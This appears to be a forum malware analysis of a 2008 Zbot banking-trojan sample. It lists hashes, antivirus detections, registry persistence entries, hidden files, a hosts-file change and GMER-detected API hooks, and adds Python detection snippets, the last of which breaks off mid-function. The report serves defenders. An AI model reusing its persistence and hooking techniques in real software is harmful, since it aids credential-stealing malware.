This is the successor of the infamous ntos.exe - wsnpoem\audio.dll - wsnpoem\video.dll - Reference.

<h4>
File details
</h4>
Filename: fgltqn.exe

Additional information
File size: 50688 bytes
MD5...: 3c9789e1ee979134439cd5049104cb88
SHA1..: 44957eb4b1dd6219db7abf2c579817d237e9e8f7
SHA256: 05fb91f442ae1f7b1ee14d935fec13e9a68d1d8eae593a7af82a7a3239e2137b
PEiD: -
QUOTE
File fgltqn.exe received on 08.25.2008 02:05:47 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2008.8.21.0 2008.08.22 -
AntiVir 7.8.1.23 2008.08.24 TR/Spy.ZBot.ecn
Authentium 5.1.0.4 2008.08.24 -
Avast 4.8.1195.0 2008.08.24 Win32:Spyware-gen
AVG 8.0.0.161 2008.08.24 PSW.Generic6.YGV
BitDefender 7.2 2008.08.25 Trojan.Spy.ZBot.JR
CAT-QuickHeal 9.50 2008.08.22 TrojanSpy.Zbot.ecn
ClamAV 0.93.1 2008.08.24 -
DrWeb 4.44.0.09170 2008.08.24 -
eSafe 7.0.17.0 2008.08.24 -
eTrust-Vet 31.6.6044 2008.08.23 -
Ewido 4.0 2008.08.24 -
F-Prot 4.4.4.56 2008.08.25 -
F-Secure 7.60.13501.0 2008.08.24 Trojan-Spy.Win32.Zbot.ecn
Fortinet 3.14.0.0 2008.08.24 PossibleThreat
GData 2.0.7306.1023 2008.08.20 Trojan-Spy.Win32.Zbot.ecn
Ikarus T3.1.1.34.0 2008.08.24 Trojan-Spy.Win32.Zbot.ecn
K7AntiVirus 7.10.427 2008.08.23 -
Kaspersky 7.0.0.125 2008.08.25 Trojan-Spy.Win32.Zbot.ecn
McAfee 5368 2008.08.22 -
Microsoft 1.3807 2008.08.25 -
NOD32v2 3383 2008.08.24 -
Norman 5.80.02 2008.08.22 W32/Zbot.AXX
Panda 9.0.0.4 2008.08.24 -
PCTools 4.4.2.0 2008.08.24 Trojan-Spy.Zbot!sd6
Prevx1 V2 2008.08.25 Malicious Software
Rising 20.58.62.00 2008.08.24 -
Sophos 4.32.0 2008.08.25 -
Sunbelt 3.1.1575.1 2008.08.23 -
Symantec 10 2008.08.24 -
TheHacker 6.3.0.6.060 2008.08.23 -
TrendMicro 8.700.0.1004 2008.08.23 -
VBA32 3.12.8.4 2008.08.23 Trojan-Spy.Win32.Zbot.ecn
ViRobot 2008.8.22.1346 2008.08.22 Spyware.Zbot.50688.E
VirusBuster 4.5.11.0 2008.08.24 -
Webwasher-Gateway 6.6.2 2008.08.24 Trojan.Spy.ZBot.ecn
<h4>
Visible signs
</h4>
Logfile of Trend Micro HijackThis v2.0.2
....
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\oembios.exe,
O4 - HKCU\..\Run: [userinit] C:\WINDOWS\system32\oembios.exe
O4 - HKUS\S-1-5-18\..\Run: [userinit] C:\WINDOWS\system32\oembios.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [userinit] C:\WINDOWS\system32\oembios.exe (User 'Default user')

Note: In some cases the O4 entries might not be present.

<h4>
Technical details
</h4>
Registry changes.
  • Keys added.
    QUOTE
    HKEY_USERS\.DEFAULT\Software\Microsoft\Protected Storage System Provider
    HKEY_USERS\.DEFAULT\Software\Microsoft\Protected Storage System Provider\S-1-5-18
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{19127AD2-394B-70F5-C650-B97867BAA1F7}
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6}
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{BCCE7320-487C-3BA7-632A-CF4905AF9CB8}
    HKEY_USERS\S-1-5-18\Software\Microsoft\Protected Storage System Provider
    HKEY_USERS\S-1-5-18\Software\Microsoft\Protected Storage System Provider\S-1-5-18
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{19127AD2-394B-70F5-C650-B97867BAA1F7}
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6}
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{BCCE7320-487C-3BA7-632A-CF4905AF9CB8}
    HKEY_USERS\S-1-5-19\Software\Microsoft\Protected Storage System Provider
    HKEY_USERS\S-1-5-19\Software\Microsoft\Protected Storage System Provider\S-1-5-19
  • Adds several entries to ensure it survives a reboot.
    QUOTE
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run "userinit"
    Type: REG_SZ
    Data: C:\WINDOWS\system32\oembios.exe
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run "userinit"
    Type: REG_SZ
    Data: C:\WINDOWS\system32\oembios.exe
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "userinit"
    Type: REG_SZ
    Data: C:\WINDOWS\system32\oembios.exe
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Userinit"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\WINDOWS\system32\userinit.exe,
    New data: C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\oembios.exe,
  • Creates a unique ID to identify the victim. This string is composed of the computer name and some random numbers / letters, and is used when uploading information to the server.
    QUOTE
    HKEY_USERS\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Network "UID"
    Type: REG_SZ
    Data: %computername%_000175EF
    HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Network "UID"
    Type: REG_SZ
    Data: %computername%_000148FD
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network "UID"
    Type: REG_SZ
    Data: %computername%_0001480C
  • Modifies the location of the following folders.
    QUOTE
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "AppData"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\Documents and Settings\NetworkService\Application Data
    New data: C:\Documents and Settings\LocalService\Application Data
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files
    New data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\Documents and Settings\NetworkService\Cookies
    New data: C:\Documents and Settings\LocalService\Cookies
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\Documents and Settings\NetworkService\Local Settings\History
    New data: C:\Documents and Settings\LocalService\Local Settings\History
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "AppData"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\Documents and Settings\NetworkService\Application Data
    New data: C:\Documents and Settings\LocalService\Application Data
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files
    New data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\Documents and Settings\NetworkService\Cookies
    New data: C:\Documents and Settings\LocalService\Cookies
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\Documents and Settings\NetworkService\Local Settings\History
    New data: C:\Documents and Settings\LocalService\Local Settings\History
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths "Directory"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5
    New data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1 "CacheLimit"
    Old type: REG_DWORD
    New type: REG_DWORD
    Old data: 00, 32, 00, 00
    New data: 97, FF, 07, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1 "CachePath"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\Cache1
    New data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2 "CacheLimit"
    Old type: REG_DWORD
    New type: REG_DWORD
    Old data: 00, 32, 00, 00
    New data: 97, FF, 07, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2 "CachePath"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\Cache2
    New data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3 "CacheLimit"
    Old type: REG_DWORD
    New type: REG_DWORD
    Old data: 00, 32, 00, 00
    New data: 97, FF, 07, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3 "CachePath"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\Cache3
    New data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4 "CacheLimit"
    Old type: REG_DWORD
    New type: REG_DWORD
    Old data: 00, 32, 00, 00
    New data: 97, FF, 07, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4 "CachePath"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\Cache4
    New data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4
  • Misc. Values added.
    QUOTE
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{19127AD2-394B-70F5-C650-B97867BAA1F7} "{02FFAC45-0B10-5633-4296-1801F1A36678}"
    Type: REG_BINARY
    Data: ö ó
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} "{E716FA10-2031-AA96-8E72-93A205C5C62C}"
    Type: REG_BINARY
    Data: G ò
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} "{F710FA10-2031-3106-8872-93A2B5C5C620}"
    Type: REG_BINARY
    Data: ÷ ò
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{BCCE7320-487C-3BA7-632A-CF4905AF9CB8} "{E716FA10-2031-AA96-8E72-93A205C5C62C}"
    Type: REG_BINARY
    Data: G ò
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{BCCE7320-487C-3BA7-632A-CF4905AF9CB8} "{F710FA10-2031-3106-8872-93A2B5C5C620}"
    Type: REG_BINARY
    Data: ÷ ò
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{19127AD2-394B-70F5-C650-B97867BAA1F7} "{02FFAC45-0B10-5633-4296-1801F1A36678}"
    Type: REG_BINARY
    Data: ö ó
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} "{E716FA10-2031-AA96-8E72-93A205C5C62C}"
    Type: REG_BINARY
    Data: G ò
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} "{F710FA10-2031-3106-8872-93A2B5C5C620}"
    Type: REG_BINARY
    Data: ÷ ò
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{BCCE7320-487C-3BA7-632A-CF4905AF9CB8} "{E716FA10-2031-AA96-8E72-93A205C5C62C}"
    Type: REG_BINARY
    Data: G ò
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{BCCE7320-487C-3BA7-632A-CF4905AF9CB8} "{F710FA10-2031-3106-8872-93A2B5C5C620}"
    Type: REG_BINARY
    Data: ÷ ò
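As an added example that is not part of the original post, the following Python shows a check a defender can run over the evidence listed above: the HijackThis F2 line from "Visible signs", the Winlogon "Userinit" value and the Run values named "userinit", and the "UID" value. It splits the Userinit list and reports any entry other than userinit.exe, flags Run values whose name imitates a Winlogon component, and parses the UID into computer name and suffix. The sample values are constructed from the report; the MIMIC_NAMES heuristic is the example's own and is not something the report states.

```python
import re

# Constructed sample inputs, using the values the report lists above.
SAMPLE_HJT_LINE = r"F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\oembios.exe,"
SAMPLE_RUN_VALUES = [
    # (key, value name, data) as they would be read from the registry
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "userinit",
     r"C:\WINDOWS\system32\oembios.exe"),
    (r"HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run", "userinit",
     r"C:\WINDOWS\system32\oembios.exe"),
    # a benign value, constructed for contrast
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "ctfmon.exe",
     r"C:\WINDOWS\system32\ctfmon.exe"),
]
SAMPLE_UID_DATA = "%computername%_0001480C"

# Only userinit.exe belongs in the Winlogon Userinit list on a clean system.
LEGITIMATE_USERINIT = {"userinit.exe"}
# Value names under Run that mimic a Winlogon component. Windows does not create a
# Run value with this name itself. Heuristic of this example, extend as needed.
MIMIC_NAMES = {"userinit"}


def userinit_entries(value):
    """Split a Winlogon Userinit REG_SZ into its comma-separated entries.
    The trailing comma Windows writes yields an empty field, which is dropped."""
    return [e.strip() for e in value.split(",") if e.strip()]


def unexpected_userinit(value):
    """Entries in the Userinit list whose file name is not the legitimate userinit.exe."""
    return [e for e in userinit_entries(value)
            if e.rsplit("\\", 1)[-1].lower() not in LEGITIMATE_USERINIT]


def userinit_from_hijackthis(line):
    """Extract the UserInit string from a HijackThis F2 line, or None if it is not one."""
    marker = "UserInit="
    if not line.startswith("F2 - ") or marker not in line:
        return None
    return line.split(marker, 1)[1]


def mimicking_run_values(run_values):
    """Run values whose name imitates a Winlogon component (see MIMIC_NAMES)."""
    return [(key, name, data) for key, name, data in run_values
            if name.lower() in MIMIC_NAMES]


def parse_uid(data):
    """Split a '<computername>_<8 hex digits>' UID into its two parts, or None."""
    m = re.fullmatch(r"(?P<computer>.+)_(?P<suffix>[0-9A-Fa-f]{8})", data)
    return (m.group("computer"), m.group("suffix")) if m else None


if __name__ == "__main__":
    print("extra Userinit entries:", unexpected_userinit(userinit_from_hijackthis(SAMPLE_HJT_LINE)))
    for key, name, data in mimicking_run_values(SAMPLE_RUN_VALUES):
        print("suspicious Run value:", key, name, data)
    print("UID parts:", parse_uid(SAMPLE_UID_DATA))
```

On a live system the same functions can be fed the output of `reg query` or a HijackThis log; the point of splitting on commas is that the extra entry hides behind the legitimate userinit.exe in a single string.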
Folders added.
QUOTE
%Profiles%\LocalService\Application Data\sysproc64
Files added.
QUOTE
%Profiles%\LocalService\Application Data\sysproc64\sysproc32.sys
Date: 8/25/2008 5:44 PM
Size: 104 bytes
%System%\oembios.exe
%System%\sysproc64\sysproc32.sys
%System%\sysproc64\sysproc86.sys

Files in red are hidden.

Files deleted.
QUOTE
%Profiles%\[USERNAME]\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol
Files changed.
QUOTE
%System%\drivers\etc\hosts
Old date: 8/4/2004 2:00 PM
New date: 8/25/2008 5:45 PM
Old size: 734 bytes
New size: 6,393 bytes
Note: %Profiles% is a variable that refers to the file system directory containing user profile folders. A typical path is C:\Documents and Settings.
%System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).


<h4>
Rootkit Scan
</h4>
GMER 1.0.14.14536 - http://www.gmer.net
Rootkit scan 2008-08-25 18:04:50
Windows 5.1.2600 Service Pack 2

---- User IAT/EAT - GMER 1.0.14 ----

IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\services.exe [ntdll.dll!NtQueryDirectoryFile] 0075492C
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtQueryDirectoryFile] 0075492C
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 007548BE
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 00754880
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 0075484D
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 00753867
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!TranslateMessage] 00753B46
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!TranslateMessage] 00753B46
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 00753867
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!TranslateMessage] 00753B46
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\WS2HELP.dll [ntdll.dll!NtQueryDirectoryFile] 0075492C
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtQueryDirectoryFile] 00B2492C
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 00B248BE
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 00B24880
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00B2484D
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\LSASRV.dll [ntdll.dll!LdrLoadDll] 00B248BE
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\SAMSRV.dll [ntdll.dll!LdrLoadDll] 00B248BE
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\SAMSRV.dll [ntdll.dll!LdrGetProcedureAddress] 00B24880
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\WS2HELP.dll [ntdll.dll!NtQueryDirectoryFile] 00B2492C
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 00B23867
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!TranslateMessage] 00B23B46
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!TranslateMessage] 00B23B46
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 00B23867
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!TranslateMessage] 00B23B46
IAT C:\WINDOWS\system32\svchost.exe[780] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00C9484D
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtQueryDirectoryFile] 0089492C
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 008948BE
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 00894880
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 0089484D
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 00893867
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!TranslateMessage] 00893B46
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!TranslateMessage] 00893B46
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 00893867
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!TranslateMessage] 00893B46
IAT C:\WINDOWS\system32\svchost.exe[840] @ c:\windows\system32\WS2HELP.dll [ntdll.dll!NtQueryDirectoryFile] 0089492C
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtQueryDirectoryFile] 014B492C
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 014B48BE
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 014B4880
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 014B484D
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 014B3867
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!TranslateMessage] 014B3B46
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!TranslateMessage] 014B3B46
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 014B3867
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!TranslateMessage] 014B3B46
IAT C:\WINDOWS\System32\svchost.exe[936] @ c:\windows\system32\WS2HELP.dll [ntdll.dll!NtQueryDirectoryFile] 014B492C
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\Explorer.EXE [USER32.dll!TranslateMessage] 011E3B46
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtQueryDirectoryFile] 011E492C
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 011E48BE
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 011E4880
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 011E484D
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!TranslateMessage] 011E3B46
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!TranslateMessage] 011E3B46
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 011E3867
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 011E3867
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!TranslateMessage] 011E3B46
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\WS2HELP.dll [ntdll.dll!NtQueryDirectoryFile] 011E492C
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtQueryDirectoryFile] 007B492C
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 007B48BE
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 007B4880
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 007B484D
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 007B3867
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!TranslateMessage] 007B3B46
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\System32\WS2HELP.dll [ntdll.dll!NtQueryDirectoryFile] 007B492C
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!TranslateMessage] 007B3B46
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 007B3867
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!TranslateMessage] 007B3B46

---- Threads - GMER 1.0.14 ----

Thread 1608:236 003547D2
Thread 1608:1004 003947D2
Thread 1608:428 003D47D2

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\oembios.exe 379904 bytes executable
File C:\WINDOWS\system32\sysproc64 0 bytes
File C:\WINDOWS\system32\sysproc64\sysproc32.sys 0 bytes
File C:\WINDOWS\system32\sysproc64\sysproc86.sys 18943 bytes

---- EOF - GMER 1.0.14 ----
Note: Other executables will appear as hooked under IAT depending on which programs are running.
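As an added example (not part of the original post, and not GMER's own code), the following Python parses GMER "IAT" lines like those in the scan above, groups the hooks by process and reports the address range their targets fall into. When every hook in a process points into one small region, as the addresses above do (for example 0075xxxx in services.exe), the hooks come from one injected code blob rather than separate patches, which matches the new memory pages the Notes section describes. The purpose assigned to each hooked export is the analyst's reading of common user-mode banking-trojan behaviour, not something the GMER log states; the sample lines are copied from the log above.

```python
import re
from collections import defaultdict

# Constructed sample: a handful of lines copied from the GMER log above, plus one
# Threads line to show that non-IAT lines are ignored.
SAMPLE_GMER = r"""
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtQueryDirectoryFile] 0075492C
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 007548BE
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 00753867
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00B2484D
IAT C:\WINDOWS\system32\svchost.exe[780] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00C9484D
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!TranslateMessage] 011E3B46
Thread 1608:236 003547D2
"""

# "IAT <process>[<pid>] @ <module> [<dll>!<export>] <hook target address>"
IAT_RE = re.compile(
    r"^IAT (?P<process>.+?)\[(?P<pid>\d+)\] @ (?P<module>\S+) "
    r"\[(?P<api>[^\]]+)\] (?P<addr>[0-9A-Fa-f]{8})$"
)

# What each hooked export is typically used for by a user-mode banking trojan.
# Analyst's interpretation for this example; the GMER log itself says nothing about purpose.
API_PURPOSE = {
    "NtQueryDirectoryFile": "directory listing (file hiding)",
    "LdrLoadDll": "module loading (re-hooking newly loaded modules)",
    "LdrGetProcedureAddress": "export resolution (re-hooking newly loaded modules)",
    "NtCreateThread": "thread creation",
    "GetClipboardData": "clipboard capture",
    "TranslateMessage": "keystroke capture",
}


def parse_gmer_iat(text):
    """Return one dict per IAT line: process, pid (int), module, api, addr (int)."""
    entries = []
    for line in text.splitlines():
        m = IAT_RE.match(line.strip())
        if m is None:
            continue  # Threads, Files, section headers and blank lines
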